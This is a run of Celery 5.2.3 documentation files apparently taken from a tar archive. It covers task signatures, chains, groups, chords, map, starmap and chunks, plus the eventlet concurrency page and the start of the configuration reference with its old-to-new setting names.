contents:: :local: :depth: 2 .. _canvas-subtasks: .. _canvas-signatures: Signatures ========== .. versionadded:: 2.0 You just learned how to call a task using the tasks ``delay`` method in the :ref:`calling ` guide, and this is often all you need, but sometimes you may want to pass the signature of a task invocation to another process or as an argument to another function. A :func:`~celery.signature` wraps the arguments, keyword arguments, and execution options of a single task invocation in a way such that it can be passed to functions or even serialized and sent across the wire. - You can create a signature for the ``add`` task using its name like this: .. code-block:: pycon >>> from celery import signature >>> signature('tasks.add', args=(2, 2), countdown=10) tasks.add(2, 2) This task has a signature of arity 2 (two arguments): ``(2, 2)``, and sets the countdown execution option to 10. - or you can create one using the task's ``signature`` method: .. code-block:: pycon >>> add.signature((2, 2), countdown=10) tasks.add(2, 2) - There's also a shortcut using star arguments: .. code-block:: pycon >>> add.s(2, 2) tasks.add(2, 2) - Keyword arguments are also supported: .. code-block:: pycon >>> add.s(2, 2, debug=True) tasks.add(2, 2, debug=True) - From any signature instance you can inspect the different fields: .. code-block:: pycon >>> s = add.signature((2, 2), {'debug': True}, countdown=10) >>> s.args (2, 2) >>> s.kwargs {'debug': True} >>> s.options {'countdown': 10} - It supports the "Calling API" of ``delay``, ``apply_async``, etc., including being called directly (``__call__``). Calling the signature will execute the task inline in the current process: .. code-block:: pycon >>> add(2, 2) 4 >>> add.s(2, 2)() 4 ``delay`` is our beloved shortcut to ``apply_async`` taking star-arguments: .. code-block:: pycon >>> result = add.delay(2, 2) >>> result.get() 4 ``apply_async`` takes the same arguments as the :meth:`Task.apply_async <@Task.apply_async>` method: .. code-block:: pycon >>> add.apply_async(args, kwargs, **options) >>> add.signature(args, kwargs, **options).apply_async() >>> add.apply_async((2, 2), countdown=1) >>> add.signature((2, 2), countdown=1).apply_async() - You can't define options with :meth:`~@Task.s`, but a chaining ``set`` call takes care of that: .. code-block:: pycon >>> add.s(2, 2).set(countdown=1) proj.tasks.add(2, 2) Partials -------- With a signature, you can execute the task in a worker: .. code-block:: pycon >>> add.s(2, 2).delay() >>> add.s(2, 2).apply_async(countdown=1) Or you can call it directly in the current process: .. code-block:: pycon >>> add.s(2, 2)() 4 Specifying additional args, kwargs, or options to ``apply_async``/``delay`` creates partials: - Any arguments added will be prepended to the args in the signature: .. code-block:: pycon >>> partial = add.s(2) # incomplete signature >>> partial.delay(4) # 4 + 2 >>> partial.apply_async((4,)) # same - Any keyword arguments added will be merged with the kwargs in the signature, with the new keyword arguments taking precedence: .. code-block:: pycon >>> s = add.s(2, 2) >>> s.delay(debug=True) # -> add(2, 2, debug=True) >>> s.apply_async(kwargs={'debug': True}) # same - Any options added will be merged with the options in the signature, with the new options taking precedence: .. code-block:: pycon >>> s = add.signature((2, 2), countdown=10) >>> s.apply_async(countdown=1) # countdown is now 1 You can also clone signatures to create derivatives: .. code-block:: pycon >>> s = add.s(2) proj.tasks.add(2) >>> s.clone(args=(4,), kwargs={'debug': True}) proj.tasks.add(4, 2, debug=True) Immutability ------------ .. versionadded:: 3.0 Partials are meant to be used with callbacks, any tasks linked, or chord callbacks will be applied with the result of the parent task. Sometimes you want to specify a callback that doesn't take additional arguments, and in that case you can set the signature to be immutable: .. code-block:: pycon >>> add.apply_async((2, 2), link=reset_buffers.signature(immutable=True)) The ``.si()`` shortcut can also be used to create immutable signatures: .. code-block:: pycon >>> add.apply_async((2, 2), link=reset_buffers.si()) Only the execution options can be set when a signature is immutable, so it's not possible to call the signature with partial args/kwargs. .. note:: In this tutorial I sometimes use the prefix operator `~` to signatures. You probably shouldn't use it in your production code, but it's a handy shortcut when experimenting in the Python shell: .. code-block:: pycon >>> ~sig >>> # is the same as >>> sig.delay().get() .. _canvas-callbacks: Callbacks --------- .. versionadded:: 3.0 Callbacks can be added to any task using the ``link`` argument to ``apply_async``: .. code-block:: pycon add.apply_async((2, 2), link=other_task.s()) The callback will only be applied if the task exited successfully, and it will be applied with the return value of the parent task as argument. As I mentioned earlier, any arguments you add to a signature, will be prepended to the arguments specified by the signature itself! If you have the signature: .. code-block:: pycon >>> sig = add.s(10) then `sig.delay(result)` becomes: .. code-block:: pycon >>> add.apply_async(args=(result, 10)) ... Now let's call our ``add`` task with a callback using partial arguments: .. code-block:: pycon >>> add.apply_async((2, 2), link=add.s(8)) As expected this will first launch one task calculating :math:`2 + 2`, then another task calculating :math:`4 + 8`. The Primitives ============== .. versionadded:: 3.0 .. topic:: Overview - ``group`` The group primitive is a signature that takes a list of tasks that should be applied in parallel. - ``chain`` The chain primitive lets us link together signatures so that one is called after the other, essentially forming a *chain* of callbacks. - ``chord`` A chord is just like a group but with a callback. A chord consists of a header group and a body, where the body is a task that should execute after all of the tasks in the header are complete. - ``map`` The map primitive works like the built-in ``map`` function, but creates a temporary task where a list of arguments is applied to the task. For example, ``task.map([1, 2])`` -- results in a single task being called, applying the arguments in order to the task function so that the result is: .. code-block:: python res = [task(1), task(2)] - ``starmap`` Works exactly like map except the arguments are applied as ``*args``. For example ``add.starmap([(2, 2), (4, 4)])`` results in a single task calling: .. code-block:: python res = [add(2, 2), add(4, 4)] - ``chunks`` Chunking splits a long list of arguments into parts, for example the operation: .. code-block:: pycon >>> items = zip(range(1000), range(1000)) # 1000 items >>> add.chunks(items, 10) will split the list of items into chunks of 10, resulting in 100 tasks (each processing 10 items in sequence). The primitives are also signature objects themselves, so that they can be combined in any number of ways to compose complex work-flows. Here's some examples: - Simple chain Here's a simple chain, the first task executes passing its return value to the next task in the chain, and so on. .. code-block:: pycon >>> from celery import chain >>> # 2 + 2 + 4 + 8 >>> res = chain(add.s(2, 2), add.s(4), add.s(8))() >>> res.get() 16 This can also be written using pipes: .. code-block:: pycon >>> (add.s(2, 2) | add.s(4) | add.s(8))().get() 16 - Immutable signatures Signatures can be partial so arguments can be added to the existing arguments, but you may not always want that, for example if you don't want the result of the previous task in a chain. In that case you can mark the signature as immutable, so that the arguments cannot be changed: .. code-block:: pycon >>> add.signature((2, 2), immutable=True) There's also a ``.si()`` shortcut for this, and this is the preferred way of creating signatures: .. code-block:: pycon >>> add.si(2, 2) Now you can create a chain of independent tasks instead: .. code-block:: pycon >>> res = (add.si(2, 2) | add.si(4, 4) | add.si(8, 8))() >>> res.get() 16 >>> res.parent.get() 8 >>> res.parent.parent.get() 4 - Simple group You can easily create a group of tasks to execute in parallel: .. code-block:: pycon >>> from celery import group >>> res = group(add.s(i, i) for i in range(10))() >>> res.get(timeout=1) [0, 2, 4, 6, 8, 10, 12, 14, 16, 18] - Simple chord The chord primitive enables us to add a callback to be called when all of the tasks in a group have finished executing. This is often required for algorithms that aren't *embarrassingly parallel*: .. code-block:: pycon >>> from celery import chord >>> res = chord((add.s(i, i) for i in range(10)), xsum.s())() >>> res.get() 90 The above example creates 10 task that all start in parallel, and when all of them are complete the return values are combined into a list and sent to the ``xsum`` task. The body of a chord can also be immutable, so that the return value of the group isn't passed on to the callback: .. code-block:: pycon >>> chord((import_contact.s(c) for c in contacts), ... notify_complete.si(import_id)).apply_async() Note the use of ``.si`` above; this creates an immutable signature, meaning any new arguments passed (including to return value of the previous task) will be ignored. - Blow your mind by combining Chains can be partial too: .. code-block:: pycon >>> c1 = (add.s(4) | mul.s(8)) # (16 + 4) * 8 >>> res = c1(16) >>> res.get() 160 this means that you can combine chains: .. code-block:: pycon # ((4 + 16) * 2 + 4) * 8 >>> c2 = (add.s(4, 16) | mul.s(2) | (add.s(4) | mul.s(8))) >>> res = c2() >>> res.get() 352 Chaining a group together with another task will automatically upgrade it to be a chord: .. code-block:: pycon >>> c3 = (group(add.s(i, i) for i in range(10)) | xsum.s()) >>> res = c3() >>> res.get() 90 Groups and chords accepts partial arguments too, so in a chain the return value of the previous task is forwarded to all tasks in the group: .. code-block:: pycon >>> new_user_workflow = (create_user.s() | group( ... import_contacts.s(), ... send_welcome_email.s())) ... new_user_workflow.delay(username='artv', ... first='Art', ... last='Vandelay', ... email='art@vandelay.com') If you don't want to forward arguments to the group then you can make the signatures in the group immutable: .. code-block:: pycon >>> res = (add.s(4, 4) | group(add.si(i, i) for i in range(10)))() >>> res.get() >>> res.parent.get() 8 .. _canvas-chain: Chains ------ .. versionadded:: 3.0 Tasks can be linked together: the linked task is called when the task returns successfully: .. code-block:: pycon >>> res = add.apply_async((2, 2), link=mul.s(16)) >>> res.get() 4 The linked task will be applied with the result of its parent task as the first argument. In the above case where the result was 4, this will result in ``mul(4, 16)``. The results will keep track of any subtasks called by the original task, and this can be accessed from the result instance: .. code-block:: pycon >>> res.children [] >>> res.children[0].get() 64 The result instance also has a :meth:`~@AsyncResult.collect` method that treats the result as a graph, enabling you to iterate over the results: .. code-block:: pycon >>> list(res.collect()) [(, 4), (, 64)] By default :meth:`~@AsyncResult.collect` will raise an :exc:`~@IncompleteStream` exception if the graph isn't fully formed (one of the tasks hasn't completed yet), but you can get an intermediate representation of the graph too: .. code-block:: pycon >>> for result, value in res.collect(intermediate=True): .... You can link together as many tasks as you like, and signatures can be linked too: .. code-block:: pycon >>> s = add.s(2, 2) >>> s.link(mul.s(4)) >>> s.link(log_result.s()) You can also add *error callbacks* using the `on_error` method: .. code-block:: pycon >>> add.s(2, 2).on_error(log_error.s()).delay() This will result in the following ``.apply_async`` call when the signature is applied: .. code-block:: pycon >>> add.apply_async((2, 2), link_error=log_error.s()) The worker won't actually call the errback as a task, but will instead call the errback function directly so that the raw request, exception and traceback objects can be passed to it. Here's an example errback: .. code-block:: python from __future__ import print_function import os from proj.celery import app @app.task def log_error(request, exc, traceback): with open(os.path.join('/var/errors', request.id), 'a') as fh: print('--\n\n{0} {1} {2}'.format( request.id, exc, traceback), file=fh) To make it even easier to link tasks together there's a special signature called :class:`~celery.chain` that lets you chain tasks together: .. code-block:: pycon >>> from celery import chain >>> from proj.tasks import add, mul >>> # (4 + 4) * 8 * 10 >>> res = chain(add.s(4, 4), mul.s(8), mul.s(10)) proj.tasks.add(4, 4) | proj.tasks.mul(8) | proj.tasks.mul(10) Calling the chain will call the tasks in the current process and return the result of the last task in the chain: .. code-block:: pycon >>> res = chain(add.s(4, 4), mul.s(8), mul.s(10))() >>> res.get() 640 It also sets ``parent`` attributes so that you can work your way up the chain to get intermediate results: .. code-block:: pycon >>> res.parent.get() 64 >>> res.parent.parent.get() 8 >>> res.parent.parent Chains can also be made using the ``|`` (pipe) operator: .. code-block:: pycon >>> (add.s(2, 2) | mul.s(8) | mul.s(10)).apply_async() Graphs ~~~~~~ In addition you can work with the result graph as a :class:`~celery.utils.graph.DependencyGraph`: .. code-block:: pycon >>> res = chain(add.s(4, 4), mul.s(8), mul.s(10))() >>> res.parent.parent.graph 285fa253-fcf8-42ef-8b95-0078897e83e6(1) 463afec2-5ed4-4036-b22d-ba067ec64f52(0) 872c3995-6fa0-46ca-98c2-5a19155afcf0(2) 285fa253-fcf8-42ef-8b95-0078897e83e6(1) 463afec2-5ed4-4036-b22d-ba067ec64f52(0) You can even convert these graphs to *dot* format: .. code-block:: pycon >>> with open('graph.dot', 'w') as fh: ... res.parent.parent.graph.to_dot(fh) and create images: .. code-block:: console $ dot -Tpng graph.dot -o graph.png .. image:: ../images/result_graph.png .. _canvas-group: Groups ------ .. versionadded:: 3.0 A group can be used to execute several tasks in parallel. The :class:`~celery.group` function takes a list of signatures: .. code-block:: pycon >>> from celery import group >>> from proj.tasks import add >>> group(add.s(2, 2), add.s(4, 4)) (proj.tasks.add(2, 2), proj.tasks.add(4, 4)) If you **call** the group, the tasks will be applied one after another in the current process, and a :class:`~celery.result.GroupResult` instance is returned that can be used to keep track of the results, or tell how many tasks are ready and so on: .. code-block:: pycon >>> g = group(add.s(2, 2), add.s(4, 4)) >>> res = g() >>> res.get() [4, 8] Group also supports iterators: .. code-block:: pycon >>> group(add.s(i, i) for i in range(100))() A group is a signature object, so it can be used in combination with other signatures. .. _group-callbacks: Group Callbacks and Error Handling ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Groups can have callback and errback signatures linked to them as well, however the behaviour can be somewhat surprising due to the fact that groups are not real tasks and simply pass linked tasks down to their encapsulated signatures. This means that the return values of a group are not collected to be passed to a linked callback signature. As an example, the following snippet using a simple `add(a, b)` task is faulty since the linked `add.s()` signature will not received the finalised group result as one might expect. .. code-block:: pycon >>> g = group(add.s(2, 2), add.s(4, 4)) >>> g.link(add.s()) >>> res = g() [4, 8] Note that the finalised results of the first two tasks are returned, but the callback signature will have run in the background and raised an exception since it did not receive the two arguments it expects. Group errbacks are passed down to encapsulated signatures as well which opens the possibility for an errback linked only once to be called more than once if multiple tasks in a group were to fail. As an example, the following snippet using a `fail()` task which raises an exception can be expected to invoke the `log_error()` signature once for each failing task which gets run in the group. .. code-block:: pycon >>> g = group(fail.s(), fail.s()) >>> g.link_error(log_error.s()) >>> res = g() With this in mind, it's generally advisable to create idempotent or counting tasks which are tolerant to being called repeatedly for use as errbacks. These use cases are better addressed by the :class:`~celery.chord` class which is supported on certain backend implementations. .. _group-results: Group Results ~~~~~~~~~~~~~ The group task returns a special result too, this result works just like normal task results, except that it works on the group as a whole: .. code-block:: pycon >>> from celery import group >>> from tasks import add >>> job = group([ ... add.s(2, 2), ... add.s(4, 4), ... add.s(8, 8), ... add.s(16, 16), ... add.s(32, 32), ... ]) >>> result = job.apply_async() >>> result.ready() # have all subtasks completed? True >>> result.successful() # were all subtasks successful? True >>> result.get() [4, 8, 16, 32, 64] The :class:`~celery.result.GroupResult` takes a list of :class:`~celery.result.AsyncResult` instances and operates on them as if it was a single task. It supports the following operations: * :meth:`~celery.result.GroupResult.successful` Return :const:`True` if all of the subtasks finished successfully (e.g., didn't raise an exception). * :meth:`~celery.result.GroupResult.failed` Return :const:`True` if any of the subtasks failed. * :meth:`~celery.result.GroupResult.waiting` Return :const:`True` if any of the subtasks isn't ready yet. * :meth:`~celery.result.GroupResult.ready` Return :const:`True` if all of the subtasks are ready. * :meth:`~celery.result.GroupResult.completed_count` Return the number of completed subtasks. * :meth:`~celery.result.GroupResult.revoke` Revoke all of the subtasks. * :meth:`~celery.result.GroupResult.join` Gather the results of all subtasks and return them in the same order as they were called (as a list). .. _canvas-chord: Chords ------ .. versionadded:: 2.3 .. note:: Tasks used within a chord must *not* ignore their results. If the result backend is disabled for *any* task (header or body) in your chord you should read ":ref:`chord-important-notes`." Chords are not currently supported with the RPC result backend. A chord is a task that only executes after all of the tasks in a group have finished executing. Let's calculate the sum of the expression :math:`1 + 1 + 2 + 2 + 3 + 3 ... n + n` up to a hundred digits. First you need two tasks, :func:`add` and :func:`tsum` (:func:`sum` is already a standard function): .. code-block:: python @app.task def add(x, y): return x + y @app.task def tsum(numbers): return sum(numbers) Now you can use a chord to calculate each addition step in parallel, and then get the sum of the resulting numbers: .. code-block:: pycon >>> from celery import chord >>> from tasks import add, tsum >>> chord(add.s(i, i) ... for i in range(100))(tsum.s()).get() 9900 This is obviously a very contrived example, the overhead of messaging and synchronization makes this a lot slower than its Python counterpart: .. code-block:: pycon >>> sum(i + i for i in range(100)) The synchronization step is costly, so you should avoid using chords as much as possible. Still, the chord is a powerful primitive to have in your toolbox as synchronization is a required step for many parallel algorithms. Let's break the chord expression down: .. code-block:: pycon >>> callback = tsum.s() >>> header = [add.s(i, i) for i in range(100)] >>> result = chord(header)(callback) >>> result.get() 9900 Remember, the callback can only be executed after all of the tasks in the header have returned. Each step in the header is executed as a task, in parallel, possibly on different nodes. The callback is then applied with the return value of each task in the header. The task id returned by :meth:`chord` is the id of the callback, so you can wait for it to complete and get the final return value (but remember to :ref:`never have a task wait for other tasks `) .. _chord-errors: Error handling ~~~~~~~~~~~~~~ So what happens if one of the tasks raises an exception? The chord callback result will transition to the failure state, and the error is set to the :exc:`~@ChordError` exception: .. code-block:: pycon >>> c = chord([add.s(4, 4), raising_task.s(), add.s(8, 8)]) >>> result = c() >>> result.get() .. code-block:: pytb Traceback (most recent call last): File "", line 1, in File "*/celery/result.py", line 120, in get interval=interval) File "*/celery/backends/amqp.py", line 150, in wait_for raise meta['result'] celery.exceptions.ChordError: Dependency 97de6f3f-ea67-4517-a21c-d867c61fcb47 raised ValueError('something something',) While the traceback may be different depending on the result backend used, you can see that the error description includes the id of the task that failed and a string representation of the original exception. You can also find the original traceback in ``result.traceback``. Note that the rest of the tasks will still execute, so the third task (``add.s(8, 8)``) is still executed even though the middle task failed. Also the :exc:`~@ChordError` only shows the task that failed first (in time): it doesn't respect the ordering of the header group. To perform an action when a chord fails you can therefore attach an errback to the chord callback: .. code-block:: python @app.task def on_chord_error(request, exc, traceback): print('Task {0!r} raised error: {1!r}'.format(request.id, exc)) .. code-block:: pycon >>> c = (group(add.s(i, i) for i in range(10)) | ... xsum.s().on_error(on_chord_error.s())).delay() Chords may have callback and errback signatures linked to them, which addresses some of the issues with linking signatures to groups. Doing so will link the provided signature to the chord's body which can be expected to gracefully invoke callbacks just once upon completion of the body, or errbacks just once if any task in the chord header or body fails. .. _chord-important-notes: Important Notes ~~~~~~~~~~~~~~~ Tasks used within a chord must *not* ignore their results. In practice this means that you must enable a :const:`result_backend` in order to use chords. Additionally, if :const:`task_ignore_result` is set to :const:`True` in your configuration, be sure that the individual tasks to be used within the chord are defined with :const:`ignore_result=False`. This applies to both Task subclasses and decorated tasks. Example Task subclass: .. code-block:: python class MyTask(Task): ignore_result = False Example decorated task: .. code-block:: python @app.task(ignore_result=False) def another_task(project): do_something() By default the synchronization step is implemented by having a recurring task poll the completion of the group every second, calling the signature when ready. Example implementation: .. code-block:: python from celery import maybe_signature @app.task(bind=True) def unlock_chord(self, group, callback, interval=1, max_retries=None): if group.ready(): return maybe_signature(callback).delay(group.join()) raise self.retry(countdown=interval, max_retries=max_retries) This is used by all result backends except Redis and Memcached: they increment a counter after each task in the header, then applies the callback when the counter exceeds the number of tasks in the set. The Redis and Memcached approach is a much better solution, but not easily implemented in other backends (suggestions welcome!). .. note:: Chords don't properly work with Redis before version 2.2; you'll need to upgrade to at least redis-server 2.2 to use them. .. note:: If you're using chords with the Redis result backend and also overriding the :meth:`Task.after_return` method, you need to make sure to call the super method or else the chord callback won't be applied. .. code-block:: python def after_return(self, *args, **kwargs): do_something() super().after_return(*args, **kwargs) .. _canvas-map: Map & Starmap ------------- :class:`~celery.map` and :class:`~celery.starmap` are built-in tasks that call the provided calling task for every element in a sequence. They differ from :class:`~celery.group` in that: - only one task message is sent. - the operation is sequential. For example using ``map``: .. code-block:: pycon >>> from proj.tasks import add >>> ~xsum.map([range(10), range(100)]) [45, 4950] is the same as having a task doing: .. code-block:: python @app.task def temp(): return [xsum(range(10)), xsum(range(100))] and using ``starmap``: .. code-block:: pycon >>> ~add.starmap(zip(range(10), range(10))) [0, 2, 4, 6, 8, 10, 12, 14, 16, 18] is the same as having a task doing: .. code-block:: python @app.task def temp(): return [add(i, i) for i in range(10)] Both ``map`` and ``starmap`` are signature objects, so they can be used as other signatures and combined in groups etc., for example to call the starmap after 10 seconds: .. code-block:: pycon >>> add.starmap(zip(range(10), range(10))).apply_async(countdown=10) .. _canvas-chunks: Chunks ------ Chunking lets you divide an iterable of work into pieces, so that if you have one million objects, you can create 10 tasks with a hundred thousand objects each. Some may worry that chunking your tasks results in a degradation of parallelism, but this is rarely true for a busy cluster and in practice since you're avoiding the overhead of messaging it may considerably increase performance. To create a chunks signature you can use :meth:`@Task.chunks`: .. code-block:: pycon >>> add.chunks(zip(range(100), range(100)), 10) As with :class:`~celery.group` the act of sending the messages for the chunks will happen in the current process when called: .. code-block:: pycon >>> from proj.tasks import add >>> res = add.chunks(zip(range(100), range(100)), 10)() >>> res.get() [[0, 2, 4, 6, 8, 10, 12, 14, 16, 18], [20, 22, 24, 26, 28, 30, 32, 34, 36, 38], [40, 42, 44, 46, 48, 50, 52, 54, 56, 58], [60, 62, 64, 66, 68, 70, 72, 74, 76, 78], [80, 82, 84, 86, 88, 90, 92, 94, 96, 98], [100, 102, 104, 106, 108, 110, 112, 114, 116, 118], [120, 122, 124, 126, 128, 130, 132, 134, 136, 138], [140, 142, 144, 146, 148, 150, 152, 154, 156, 158], [160, 162, 164, 166, 168, 170, 172, 174, 176, 178], [180, 182, 184, 186, 188, 190, 192, 194, 196, 198]] while calling ``.apply_async`` will create a dedicated task so that the individual tasks are applied in a worker instead: .. code-block:: pycon >>> add.chunks(zip(range(100), range(100)), 10).apply_async() You can also convert chunks to a group: .. code-block:: pycon >>> group = add.chunks(zip(range(100), range(100)), 10).group() and with the group skew the countdown of each task by increments of one: .. code-block:: pycon >>> group.skew(start=1, stop=10)() This means that the first task will have a countdown of one second, the second task a countdown of two seconds, and so on. ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.703755 celery-5.2.3/docs/userguide/concurrency/0000775000175000017500000000000000000000000020153 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/concurrency/eventlet.rst0000664000175000017500000000515300000000000022537 0ustar00asifasif00000000000000.. _concurrency-eventlet: =========================== Concurrency with Eventlet =========================== .. _eventlet-introduction: Introduction ============ The `Eventlet`_ homepage describes it as a concurrent networking library for Python that allows you to change how you run your code, not how you write it. * It uses `epoll(4)`_ or `libevent`_ for `highly scalable non-blocking I/O`_. * `Coroutines`_ ensure that the developer uses a blocking style of programming that's similar to threading, but provide the benefits of non-blocking I/O. * The event dispatch is implicit: meaning you can easily use Eventlet from the Python interpreter, or as a small part of a larger application. Celery supports Eventlet as an alternative execution pool implementation and in some cases superior to prefork. However, you need to ensure one task doesn't block the event loop too long. Generally, CPU-bound operations don't go well with Eventlet. Also note that some libraries, usually with C extensions, cannot be monkeypatched and therefore cannot benefit from using Eventlet. Please refer to their documentation if you are not sure. For example, pylibmc does not allow cooperation with Eventlet but psycopg2 does when both of them are libraries with C extensions. The prefork pool can take use of multiple processes, but how many is often limited to a few processes per CPU. With Eventlet you can efficiently spawn hundreds, or thousands of green threads. In an informal test with a feed hub system the Eventlet pool could fetch and process hundreds of feeds every second, while the prefork pool spent 14 seconds processing 100 feeds. Note that this is one of the applications async I/O is especially good at (asynchronous HTTP requests). You may want a mix of both Eventlet and prefork workers, and route tasks according to compatibility or what works best. Enabling Eventlet ================= You can enable the Eventlet pool by using the :option:`celery worker -P` worker option. .. code-block:: console $ celery -A proj worker -P eventlet -c 1000 .. _eventlet-examples: Examples ======== See the `Eventlet examples`_ directory in the Celery distribution for some examples taking use of Eventlet support. .. _`Eventlet`: http://eventlet.net .. _`epoll(4)`: http://linux.die.net/man/4/epoll .. _`libevent`: http://monkey.org/~provos/libevent/ .. _`highly scalable non-blocking I/O`: https://en.wikipedia.org/wiki/Asynchronous_I/O#Select.28.2Fpoll.29_loops .. _`Coroutines`: https://en.wikipedia.org/wiki/Coroutine .. _`Eventlet examples`: https://github.com/celery/celery/tree/master/examples/eventlet ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/concurrency/index.rst0000664000175000017500000000021400000000000022011 0ustar00asifasif00000000000000.. _concurrency: ============= Concurrency ============= :Release: |version| :Date: |today| .. toctree:: :maxdepth: 2 eventlet ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/docs/userguide/configuration.rst0000664000175000017500000026034000000000000021227 0ustar00asifasif00000000000000.. _configuration: ============================ Configuration and defaults ============================ This document describes the configuration options available. If you're using the default loader, you must create the :file:`celeryconfig.py` module and make sure it's available on the Python path. .. contents:: :local: :depth: 2 .. _conf-example: Example configuration file ========================== This is an example configuration file to get you started. It should contain all you need to run a basic Celery set-up. .. code-block:: python ## Broker settings. broker_url = 'amqp://guest:guest@localhost:5672//' # List of modules to import when the Celery worker starts. imports = ('myapp.tasks',) ## Using the database to store task state and results. result_backend = 'db+sqlite:///results.db' task_annotations = {'tasks.add': {'rate_limit': '10/s'}} .. _conf-old-settings-map: New lowercase settings ====================== Version 4.0 introduced new lower case settings and setting organization. The major difference between previous versions, apart from the lower case names, are the renaming of some prefixes, like ``celery_beat_`` to ``beat_``, ``celeryd_`` to ``worker_``, and most of the top level ``celery_`` settings have been moved into a new ``task_`` prefix. .. warning:: Celery will still be able to read old configuration files until Celery 6.0. Afterwards, support for the old configuration files will be removed. We provide the ``celery upgrade`` command that should handle plenty of cases (including :ref:`Django `). Please migrate to the new configuration scheme as soon as possible. ========================================== ============================================== **Setting name** **Replace with** ========================================== ============================================== ``CELERY_ACCEPT_CONTENT`` :setting:`accept_content` ``CELERY_ENABLE_UTC`` :setting:`enable_utc` ``CELERY_IMPORTS`` :setting:`imports` ``CELERY_INCLUDE`` :setting:`include` ``CELERY_TIMEZONE`` :setting:`timezone` ``CELERYBEAT_MAX_LOOP_INTERVAL`` :setting:`beat_max_loop_interval` ``CELERYBEAT_SCHEDULE`` :setting:`beat_schedule` ``CELERYBEAT_SCHEDULER`` :setting:`beat_scheduler` ``CELERYBEAT_SCHEDULE_FILENAME`` :setting:`beat_schedule_filename` ``CELERYBEAT_SYNC_EVERY`` :setting:`beat_sync_every` ``BROKER_URL`` :setting:`broker_url` ``BROKER_TRANSPORT`` :setting:`broker_transport` ``BROKER_TRANSPORT_OPTIONS`` :setting:`broker_transport_options` ``BROKER_CONNECTION_TIMEOUT`` :setting:`broker_connection_timeout` ``BROKER_CONNECTION_RETRY`` :setting:`broker_connection_retry` ``BROKER_CONNECTION_MAX_RETRIES`` :setting:`broker_connection_max_retries` ``BROKER_FAILOVER_STRATEGY`` :setting:`broker_failover_strategy` ``BROKER_HEARTBEAT`` :setting:`broker_heartbeat` ``BROKER_LOGIN_METHOD`` :setting:`broker_login_method` ``BROKER_POOL_LIMIT`` :setting:`broker_pool_limit` ``BROKER_USE_SSL`` :setting:`broker_use_ssl` ``CELERY_CACHE_BACKEND`` :setting:`cache_backend` ``CELERY_CACHE_BACKEND_OPTIONS`` :setting:`cache_backend_options` ``CASSANDRA_COLUMN_FAMILY`` :setting:`cassandra_table` ``CASSANDRA_ENTRY_TTL`` :setting:`cassandra_entry_ttl` ``CASSANDRA_KEYSPACE`` :setting:`cassandra_keyspace` ``CASSANDRA_PORT`` :setting:`cassandra_port` ``CASSANDRA_READ_CONSISTENCY`` :setting:`cassandra_read_consistency` ``CASSANDRA_SERVERS`` :setting:`cassandra_servers` ``CASSANDRA_WRITE_CONSISTENCY`` :setting:`cassandra_write_consistency` ``CASSANDRA_OPTIONS`` :setting:`cassandra_options` ``S3_ACCESS_KEY_ID`` :setting:`s3_access_key_id` ``S3_SECRET_ACCESS_KEY`` :setting:`s3_secret_access_key` ``S3_BUCKET`` :setting:`s3_bucket` ``S3_BASE_PATH`` :setting:`s3_base_path` ``S3_ENDPOINT_URL`` :setting:`s3_endpoint_url` ``S3_REGION`` :setting:`s3_region` ``CELERY_COUCHBASE_BACKEND_SETTINGS`` :setting:`couchbase_backend_settings` ``CELERY_ARANGODB_BACKEND_SETTINGS`` :setting:`arangodb_backend_settings` ``CELERY_MONGODB_BACKEND_SETTINGS`` :setting:`mongodb_backend_settings` ``CELERY_EVENT_QUEUE_EXPIRES`` :setting:`event_queue_expires` ``CELERY_EVENT_QUEUE_TTL`` :setting:`event_queue_ttl` ``CELERY_EVENT_QUEUE_PREFIX`` :setting:`event_queue_prefix` ``CELERY_EVENT_SERIALIZER`` :setting:`event_serializer` ``CELERY_REDIS_DB`` :setting:`redis_db` ``CELERY_REDIS_HOST`` :setting:`redis_host` ``CELERY_REDIS_MAX_CONNECTIONS`` :setting:`redis_max_connections` ``CELERY_REDIS_USERNAME`` :setting:`redis_username` ``CELERY_REDIS_PASSWORD`` :setting:`redis_password` ``CELERY_REDIS_PORT`` :setting:`redis_port` ``CELERY_REDIS_BACKEND_USE_SSL`` :setting:`redis_backend_use_ssl` ``CELERY_RESULT_BACKEND`` :setting:`result_backend` ``CELERY_MAX_CACHED_RESULTS`` :setting:`result_cache_max` ``CELERY_MESSAGE_COMPRESSION`` :setting:`result_compression` ``CELERY_RESULT_EXCHANGE`` :setting:`result_exchange` ``CELERY_RESULT_EXCHANGE_TYPE`` :setting:`result_exchange_type` ``CELERY_RESULT_EXPIRES`` :setting:`result_expires` ``CELERY_RESULT_PERSISTENT`` :setting:`result_persistent` ``CELERY_RESULT_SERIALIZER`` :setting:`result_serializer` ``CELERY_RESULT_DBURI`` Use :setting:`result_backend` instead. ``CELERY_RESULT_ENGINE_OPTIONS`` :setting:`database_engine_options` ``[...]_DB_SHORT_LIVED_SESSIONS`` :setting:`database_short_lived_sessions` ``CELERY_RESULT_DB_TABLE_NAMES`` :setting:`database_db_names` ``CELERY_SECURITY_CERTIFICATE`` :setting:`security_certificate` ``CELERY_SECURITY_CERT_STORE`` :setting:`security_cert_store` ``CELERY_SECURITY_KEY`` :setting:`security_key` ``CELERY_ACKS_LATE`` :setting:`task_acks_late` ``CELERY_ACKS_ON_FAILURE_OR_TIMEOUT`` :setting:`task_acks_on_failure_or_timeout` ``CELERY_ALWAYS_EAGER`` :setting:`task_always_eager` ``CELERY_ANNOTATIONS`` :setting:`task_annotations` ``CELERY_COMPRESSION`` :setting:`task_compression` ``CELERY_CREATE_MISSING_QUEUES`` :setting:`task_create_missing_queues` ``CELERY_DEFAULT_DELIVERY_MODE`` :setting:`task_default_delivery_mode` ``CELERY_DEFAULT_EXCHANGE`` :setting:`task_default_exchange` ``CELERY_DEFAULT_EXCHANGE_TYPE`` :setting:`task_default_exchange_type` ``CELERY_DEFAULT_QUEUE`` :setting:`task_default_queue` ``CELERY_DEFAULT_RATE_LIMIT`` :setting:`task_default_rate_limit` ``CELERY_DEFAULT_ROUTING_KEY`` :setting:`task_default_routing_key` ``CELERY_EAGER_PROPAGATES`` :setting:`task_eager_propagates` 